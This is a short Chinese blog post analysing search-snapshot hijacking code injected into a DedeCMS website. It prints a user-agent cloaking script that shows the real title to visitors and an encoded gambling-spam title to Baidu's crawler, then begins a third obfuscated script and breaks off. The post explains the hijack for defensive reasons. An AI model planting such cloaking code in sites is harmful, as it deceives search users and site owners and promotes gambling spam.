百度快照劫持代码实战分析
作者:admin / 2016-08-14 11:55 / 浏览次数:
【1】<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title = "{dede:global.cfg_webname/}"}</script>
大家来看这段JS,JS里面包含一个判断,是根据什么判断呢,这是是根据userAgent来判断,如果不是百度来的,那就显示dedecms本身的标题,所以这也就是为什么我们直接打开网页,(输入网址的方式打开)而显示正常标题的原因。
【2】<title>天津时时彩,天
津时时彩规则,天
津时时彩玩法,天
津时时彩稳赢方案
-彩乐园</title>
我们再来看这三行代码,这三行代码好像看不懂,不过他采用的是Unicode编码,解码以后,是“天津时时彩,天津时时彩规则,天津时时彩玩法,天津时时彩稳赢方案-彩乐园”这一行代码,搞懂了。
【3】
<script type="text/javascript">
window["document"]["write"] ('
原文网址:http://www.jingzii.com/a/xwdt/gsxw/366.html